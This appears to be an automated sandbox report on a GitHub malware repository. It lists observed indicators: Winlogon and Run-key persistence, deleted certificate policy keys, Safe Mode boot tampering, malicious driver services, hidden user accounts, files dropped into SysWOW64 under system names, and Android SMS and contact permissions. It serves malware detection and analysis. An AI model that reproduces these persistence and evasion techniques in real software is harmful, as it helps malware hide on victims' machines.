Analysis Overview
Threat Level: Known bad
The file https://github.com/Da2dalus/The-MALWARE-Repo was found to be: Known bad.
Malicious Activity Summary
Wipelock
Wipelock Android payload
Modifies WinLogon for persistence
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
Manipulates Digital Signatures
Office macro that triggers on suspicious action
Sets file to hidden
Modifies Windows Firewall
Suspicious Office macro
Sets service image path in registry
Executes dropped EXE
Impair Defenses: Safe Mode Boot
Enumerates connected drives
Adds Run key to start application
Declares broadcast receivers with permission to handle system events
Declares services with permission to bind to the system
Password Policy Discovery
Requests dangerous framework permissions
Drops file in System32 directory
Hide Artifacts: Hidden Users
Launches sc.exe
Drops file in Windows directory
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Browser Information Discovery
Event Triggered Execution: Netsh Helper DLL
Program crash
Permission Groups Discovery: Local Groups
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer start page
Opens file in notepad (likely ransom note)
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious behavior: LoadsDriver
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
NTFS ADS
Modifies Internet Explorer settings
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-12 20:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-12 20:19
Reported
2024-08-12 20:32
Platform
win11-20240802-en
Max time kernel
729s
Max time network
440s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit32.exe" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Wipelock
Wipelock Android payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher\CTLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher\CRLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPublisher\Certificates | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\qpqpozmwyablbpbwj\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\qpqpozmwyablbpbwj.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zzsqebewkrhila\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\zzsqebewkrhila.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\mssqlaq.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\mssql.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\igvfpxuxmkoorey\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\igvfpxuxmkoorey.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\utdrkgojlbyxehfm\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\utdrkgojlbyxehfm.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\nelejskklawzyyeyf\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\nelejskklawzyyeyf.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\vngoaccjxrjwij\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\vngoaccjxrjwij.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\kctlwwixkqmsfr\ImagePath = "\\??\\C:\\Users\\Admin\\Desktop\\New folder\\ac\\kctlwwixkqmsfr.sys" | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\nc123.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\mssql2.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
Impair Defenses: Safe Mode Boot
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\NELEJSKKLAWZYYEYF.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\zzsqebewkrhila.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\KCTLWWIXKQMSFR.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\igvfpxuxmkoorey.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\utdrkgojlbyxehfm.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\UTDRKGOJLBYXEHFM.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vngoaccjxrjwij.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\VNGOACCJXRJWIJ.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\IGVFPXUXMKOOREY.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\qpqpozmwyablbpbwj.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\QPQPOZMWYABLBPBWJ.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\nelejskklawzyyeyf.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ZZSQEBEWKRHILA.SYS | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\kctlwwixkqmsfr.sys | C:\Users\Admin\Desktop\New folder\ac\mssql.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost32 = "C:\\Windows\\system32\\dllhost32.exe" | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Declares broadcast receivers with permission to handle system events
| Description | Indicator | Process | Target |
| Required by device admin receivers to bind with the system. Allows apps to manage device administration features. | android.permission.BIND_DEVICE_ADMIN | N/A | N/A |
| Required by device admin receivers to bind with the system. Allows apps to manage device administration features. | android.permission.BIND_DEVICE_ADMIN | N/A | N/A |
Declares services with permission to bind to the system
| Description | Indicator | Process | Target |
| Required by wallpaper services to bind with the system. Allows apps to provide live wallpapers. | android.permission.BIND_WALLPAPER | N/A | N/A |
| Required by wallpaper services to bind with the system. Allows apps to provide live wallpapers. | android.permission.BIND_WALLPAPER | N/A | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
Password Policy Discovery
Requests dangerous framework permissions
| Description | Indicator | Process | Target |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to initiate a phone call without going through the Dialer user interface for the user to confirm the call. | android.permission.CALL_PHONE | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. | android.permission.READ_PHONE_STATE | N/A | N/A |
| Allows an application to receive SMS messages. | android.permission.RECEIVE_SMS | N/A | N/A |
| Allows an application to send SMS messages. | android.permission.SEND_SMS | N/A | N/A |
| Allows an application to read SMS messages. | android.permission.READ_SMS | N/A | N/A |
| Allows an application to read the user's contacts data. | android.permission.READ_CONTACTS | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read or write the system settings. | android.permission.WRITE_SETTINGS | N/A | N/A |
| Allows an app to create windows using the type LayoutParams.TYPE_APPLICATION_OVERLAY, shown on top of all other apps. | android.permission.SYSTEM_ALERT_WINDOW | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows read only access to phone state, including the current cellular network information, the status of any ongoing calls, and a list of any PhoneAccounts registered on the device. | android.permission.READ_PHONE_STATE | N/A | N/A |
| Allows an application to receive SMS messages. | android.permission.RECEIVE_SMS | N/A | N/A |
| Allows an application to send SMS messages. | android.permission.SEND_SMS | N/A | N/A |
| Allows an application to read SMS messages. | android.permission.READ_SMS | N/A | N/A |
| Allows an application to read the user's contacts data. | android.permission.READ_CONTACTS | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read or write the system settings. | android.permission.WRITE_SETTINGS | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\windows\SysWOW64\logon.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\systray.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\win.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\wowexec.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\progman.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\progman.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntoskrnl.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\alg.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ctfmon.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dumprep.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\logon.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\MDM.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\services.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\dumprep.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\bootok.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\imapi.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\MDM.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\recover.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntoskrnl.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\ntkrnlpa.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chkntfs.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wuauclt.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\WINDOWS\SysWOW64\userinit.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\regedit.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\autochk.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\chcp.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\wuauclt.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\dllhost32.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\shutdown.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\alg.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\services.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\userinit32.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\ntkrnlpa.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\bootok.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\wowexec.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\chcp.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\windows\SysWOW64\imapi.exe | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| File created | C:\Windows\SysWOW64\win.exe:Zone.Identifier:$DATA | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Hide Artifacts: Hidden Users
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\systembackup = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\NOTEPAD.EXE | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Permission Groups Discovery: Local Groups
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Desktop\New folder\FlashKiller.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Fantom.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\ac\mssql2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Wbem\WMIC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\ac\nc123.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\ac\EVER\SearchHost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Dharma.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New folder\Flasher.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\find.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Desktop\New folder\Fagot.a.exe | N/A |
